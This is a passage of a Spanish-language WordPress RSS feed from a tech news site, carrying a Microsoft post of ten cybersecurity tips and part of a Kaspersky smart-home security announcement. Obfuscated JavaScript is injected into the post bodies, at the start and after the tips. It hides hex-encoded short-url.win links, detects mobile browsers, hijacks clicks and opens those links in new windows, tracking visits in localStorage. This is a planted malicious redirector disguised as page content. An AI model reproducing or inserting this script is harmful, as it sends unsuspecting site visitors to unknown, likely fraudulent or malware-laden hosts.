_0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/cinco-ideas-para-darles-una-segunda-oportunidad-a-tus-viejos-dispositivos/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">93674</post-id>	</item>
		<item>
		<title>10 consejos para asegurar los datos personales y proteger los dispositivos</title>
		<link>https://www.todoenunclick.com/10-consejos-para-asegurar-los-datos-personales-y-proteger-los-dispositivos/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Tue, 19 Oct 2021 21:05:15 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[Ciberseguridad]]></category>
		<category><![CDATA[consejos]]></category>
		<category><![CDATA[datos personales]]></category>
		<category><![CDATA[dispositivos]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[protección]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=47</guid>

					<description><![CDATA[<p><img width="951" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2021/10/ciber-moviles.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/10/ciber-moviles.jpg?w=951&amp;ssl=1 951w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/10/ciber-moviles.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/10/ciber-moviles.jpg?resize=504%2C336&amp;ssl=1 504w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/10/ciber-moviles.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/10/ciber-moviles.jpg?resize=630%2C420&amp;ssl=1 630w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/10/ciber-moviles.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/10/ciber-moviles.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 951px) 100vw, 951px" /></p><!-- wp:paragraph -->
<p><em>En el marco del Mes de la Ciberseguridad Microsoft compartió 10 consejos entre los que se destacan: compartir información personal en tiempo real, utilizar una publicación de autenticación en vez de contraseñas, instalar actualizaciones de software y mantener el navegador actualizado.</em></p>
<!-- /wp:paragraph -->

<!-- wp:separator {"className":"is-style-wide"} --><hr class="wp-block-separator is-style-wide" /><!-- /wp:separator -->

<!-- wp:paragraph -->
<p>En el año 2021, los ciberdelitos se volvieron más sofisticados, generalizados e imperceptibles. Los ciberdelincuentes se dirigieron a infraestructuras críticas como centros de atención médica, tecnología de la información, servicios financieros, energía, entre otros. Más allá de esto, hay tendencias positivas: las víctimas hablan y muestran el costo que estos ataques tienen. Los gobiernos, a su vez, están aprobando nuevas leyes y asignando más recursos a medida que reconocen el delito cibernético como una amenaza para la seguridad nacional.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>A principios de este mes, Microsoft publicó el <a href="https://www.microsoft.com/en-us/security/business/microsoft-digital-defense-report"><strong>Informe de Defensa Digital 2021</strong></a>. Basándose en más de 24 billones de señales de seguridad diarias brindadas por la nube de Microsoft, estos resultados amplían el <a href="https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWxPuf?culture=en-us&amp;country=US">informe</a> del año pasado y reúne aportes de más de 8500 expertos en seguridad que abarcan 77 países, incluidos conocimientos sobre la evolución del ransomware, e3l correo electrónico malicioso y el malware.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Cuidarse y protegerse de cualquier ciberdelito es una tarea que las personas más que nunca deben tener en mente. En este sentido, Microsoft continúa con los anuncios por el Mes de la Ciberseguridad y  da a conocer una <a href="https://1drv.ms/b/s!AhoZgaas199JpmbnFSgMtrRtsm3O?e=AEEvYr">infografía</a> con 10 consejos para que todas las personas puedan asegurar sus datos personales y proteger sus dispositivos:</p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true,"type":"1"} -->
<ol type="1">
<li>Compartir la información personal solo en tiempo real, de preferencia en persona o por teléfono. Tener cuidado con lo que se comparte en las redes sociales.</li>
<li>Ser escéptico con los mensajes con enlaces, en especial aquellos que solicitan información personal.</li>
<li>Estar atento a los mensajes con archivos adjuntos.</li>
<li>Olvidarse de las contraseñas y utilizar una aplicación de autenticación para una mayor seguridad.</li>
<li>Si se deben usar contraseñas, hacerlas seguras.</li>
<li>Habilitar la función de bloqueo en todos los dispositivos móviles.</li>
<li>Instalar actualizaciones de software de inmediato.</li>
<li>Asegurarse de que todas las aplicaciones del dispositivo sean legítimas.</li>
<li>Utilizar Windows 11 y activar <strong><em>Tamper Protection</em></strong> para proteger la configuración de seguridad.</li>
<li>Mantener el navegador actualizado, navegar en Modo Incógnito y habilitar Pop-Up Blocker.</li>
</ol>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>Para seguir más novedades sobre los anuncios de Microsoft sobre Ciberseguridad podes ingresar al siguiente <a href="https://www.microsoft.com/en-us/securitynow">link</a>.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph --><!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/10-consejos-para-asegurar-los-datos-personales-y-proteger-los-dispositivos/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">93573</post-id>	</item>
		<item>
		<title>Kaspersky Smart Home Security: nuevo producto de Kaspersky para proteger los dispositivos conectados en el hogar</title>
		<link>https://www.todoenunclick.com/kaspersky-smart-home-security-nuevo-producto-de-kaspersky-para-proteger-los-dispositivos-conectados-en-el-hogar/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Wed, 15 Sep 2021 21:31:53 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[dispositivos]]></category>
		<category><![CDATA[Hogar]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[Kaspersky Smart Home Security]]></category>
		<category><![CDATA[protección]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=1225</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2021/09/Kaspersky-Smart-Home-Security.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/09/Kaspersky-Smart-Home-Security.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/09/Kaspersky-Smart-Home-Security.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/09/Kaspersky-Smart-Home-Security.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/09/Kaspersky-Smart-Home-Security.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/09/Kaspersky-Smart-Home-Security.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/09/Kaspersky-Smart-Home-Security.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/09/Kaspersky-Smart-Home-Security.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>Kaspersky anunció el lanzamiento de una nueva solución: Kaspersky Smart Home Security. El nuevo enfoque ayudará a los operadores de telecomunicaciones a responder a la creciente demanda de los consumidores para proteger los dispositivos domésticos inteligentes. Proporciona protección integral contra una amplia gama de posibles amenazas: averías de dispositivos, ataques maliciosos, vigilancia encubierta y más. El producto es instalado en un ruteador por un operador de telecomunicaciones, y el usuario sólo debe descargar una aplicación en un teléfono inteligente para controlar y monitorear la seguridad del dispositivo.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Hoy en día, la tendencia de contar con dispositivos inteligentes individuales en el hogar ha evolucionado a tener un <a href="https://www.researchandmarkets.com/reports/5301163/the-future-of-connected-living-2021-study?utm_source=GNOM&amp;utm_medium=PressRelease&amp;utm_code=whwpv5&amp;utm_campaign=1510432+-+The+Future+of+Connected+Living%3a+The+Top+3+Connectivity+Ecosystems+that+will+Simplify+Human+Lives+-+Homes%2c+Cities+and+Workplaces&amp;utm_exec=cari18prd">ecosistema conectado</a> que consta de varios dispositivos en red. En particular, el mercado de dispositivos de Internet de las cosas (IoT) ha experimentado recientemente un crecimiento activo, con un <a href="https://www.fortunebusinessinsights.com/industry-reports/internet-of-things-iot-market-100307">aumento espectacular</a> del 23.1% en 2020. Esta tendencia destaca la necesidad de proporcionar una protección integral de este ecosistema frente a una amplia gama de amenazas. Este es un hecho respaldado por la encuesta de Nokia, que muestra que el número de ataques destinados a hackear dispositivos conectados se ha <a href="https://onestore.nokia.com/asset/210088">duplicado</a> desde el año anterior (de 16.17% a 32.72%). Además, un informe de Kaspersky también encontró que la mayoría de los usuarios (89%) están preocupados por la seguridad de sus dispositivos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El nuevo producto combina varios aspectos clave de la ciberseguridad, incluida la protección contra malware, vigilancia oculta, control de Internet y más. En particular, el conjunto de control de intrusiones incluye: escaneo de archivos por AV, bloqueo de ataques de fuerza bruta, verificación de URL sospechosas y monitoreo de puertos y protocolos de Internet.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El kit de verificación de seguridad permite a los clientes controlar el nivel de seguridad del sistema y los dispositivos. El producto notificará al usuario si las contraseñas de los dispositivos son demasiado débiles y también ayudará a elegir una opción nueva y segura. Además, el set incluye la verificación de protocolos de Internet y puertos de Internet vulnerables.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Kaspersky Smart Home Security también brinda a los padres la posibilidad de establecer restricciones de uso de Internet para sus hijos, como el uso de Internet por la noche u otros horarios indeseables, y para evitar visitas a sitios web inapropiados.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>“<em>Vemos que la popularidad de los dispositivos domésticos inteligentes crece cada año. Paralelamente, también está creciendo el número de ataques destinados a hackear dispositivos conectados. Teniendo en cuenta que el hogar inteligente no es una tendencia temporal, sino nuestro futuro, es obvio que esta categoría de dispositivos requiere un producto completo que brinde una protección integral contra una amplia gama de amenazas. Creemos que Kaspersky Smart Home Security ayudará a los operadores de telecomunicaciones a responder a la creciente demanda de los usuarios para proteger los dispositivos de su hogar inteligente</em>”, asegura<strong> Oleg Nevstruev, director de Gestión de Productos tecnológicos y Personalizados en Kaspersky.</strong></p>
<!-- /wp:paragraph -->

